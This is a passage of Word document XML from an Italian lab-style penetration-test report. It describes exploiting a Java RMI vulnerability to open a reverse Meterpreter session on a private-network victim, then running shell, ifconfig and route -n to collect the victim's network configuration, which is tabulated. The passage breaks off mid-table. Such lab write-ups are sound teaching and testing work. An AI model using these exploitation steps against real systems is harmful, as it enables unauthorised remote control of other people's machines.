          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>invio dell'RMI Header e dell'RMI Call al registro della vittima;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000073">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>risposta della vittima con la richiesta del payload JAR e invio dello stage (58073 byte);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000074">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">apertura della sessione: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="1b7f3b"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Meterpreter session 1 opened</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (192.168.11.111:4444 → 192.168.11.112:41248).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000075">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">L'exploit è andato a buon fine al primo tentativo, senza necessità di intervenire sul parametro HTTPDELAY. Il prompt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>meterpreter &gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> conferma il pieno controllo interattivo sulla macchina remota.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000076">
      <w:pPr>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="57150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23"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="3714750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000077">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="220" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Fig. 6 — Exploitation completata: la vulnerabilità Java RMI viene sfruttata con successo e si apre una sessione Meterpreter dalla vittima verso l'attaccante.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000078">
      <w:r>
        <w:rPr/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000079">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="320" w:beforeAutospacing="0" w:after="140" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="6d28d9"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>6. Fase 4 — Post-exploitation e raccolta delle evidenze</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000007A">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ottenuta la sessione, si passa alla raccolta delle evidenze richieste dalla traccia. Poiché il payload Java Meterpreter offre un set di comandi limitato, si apre una shell di sistema nativa sulla macchina compromessa con il comando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, eseguendo poi i comandi Linux standard:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000007B">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="d9d2f0" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="d9d2f0" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="d9d2f0" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="f3f1fa"/>
        <w:spacing w:before="60" w:beforeAutospacing="0" w:after="160" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2b2153"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2b2153"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2b2153"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2b2153"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2b2153"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>route -n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000007C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="220" w:beforeAutospacing="0" w:after="100" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e1b2e"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6.1 Evidenza 1 — Configurazione di rete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000007D">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Il comando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> eseguito sulla vittima mostra la configurazione dell'interfaccia </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>eth0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000007E">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="10" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9000" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="c9c0e8" w:sz="2" w:space="0"/>
          <w:left w:val="single" w:color="c9c0e8" w:sz="2" w:space="0"/>
          <w:bottom w:val="single" w:color="c9c0e8" w:sz="2" w:space="0"/>
          <w:right w:val="single" w:color="c9c0e8" w:sz="2" w:space="0"/>
          <w:insideH w:val="single" w:color="c9c0e8" w:sz="2" w:space="0"/>
          <w:insideV w:val="single" w:color="c9c0e8" w:sz="2" w:space="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3400"/>
        <w:gridCol w:w="5600"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="on"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="100010000000"/>
            <w:tcW w:w="3400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="6d28d9"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000007F">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Parametro</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="100001000000"/>
            <w:tcW w:w="5600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="6d28d9"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000080">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Valore</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="3400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000081">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Interfaccia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000001000000"/>
            <w:tcW w:w="5600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000082">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>eth0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="3400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="edeaf5"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000083">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Indirizzo MAC (HWaddr)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000001000000"/>
            <w:tcW w:w="5600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="edeaf5"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000084">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>66:3b:90:82:94:e5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="3400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000085">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Indirizzo IPv4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000001000000"/>
            <w:tcW w:w="5600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000086">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>192.168.11.112</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="3400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="edeaf5"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000087">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Netmask</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000001000000"/>
            <w:tcW w:w="5600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="edeaf5"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000088">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>255.255.255.0 (/24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="3400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000089">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Broadcast</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000001000000"/>
            <w:tcW w:w="5600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000008A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>192.168.11.255</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="3400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="edeaf5"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000008B">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>IPv6 (link-local)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000001000000"/>
            <w:tcW w:w="5600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="edeaf5"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000008C">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>fe80::643b:90ff:fe82:94e5/64</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="3400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000008D">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Stato</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000001000000"/>
            <w:tcW w:w="5600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000008E">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UP BROADCAST RUNNING MULTICAST — MTU 1500</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0000008F">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>L'indirizzo IPv4 rilevato (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>192.168.11.112</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) coincide con quello della macchina vittima previsto dalla traccia, a conferma che si sta operando sull'host corretto. È presente inoltre l'interfaccia di loopback </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (127.0.0.1), del tutto normale.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000090">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="220" w:beforeAutospacing="0" w:after="100" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e1b2e"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6.2 Evidenza 2 — Tabella di routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000091">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Il comando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>route -n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> restituisce la tabella di routing del kernel della macchina vittima:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000092">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="10" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9000" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="c9c0e8" w:sz="2" w:space="0"/>
          <w:left w:val="single" w:color="c9c0e8" w:sz="2" w:space="0"/>
          <w:bottom w:val="single" w:color="c9c0e8" w:sz="2" w:space="0"/>
          <w:right w:val="single" w:color="c9c0e8" w:sz="2" w:space="0"/>
          <w:insideH w:val="single" w:color="c9c0e8" w:sz="2" w:space="0"/>
          <w:insideV w:val="single" w:color="c9c0e8" w:sz="2" w:space="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2200"/>
        <w:gridCol w:w="2200"/>
        <w:gridCol w:w="2200"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="1200"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="on"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="100010000000"/>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="6d28d9"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000093">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Destination</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="100001000000"/>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="6d28d9"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000094">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="100010000000"/>
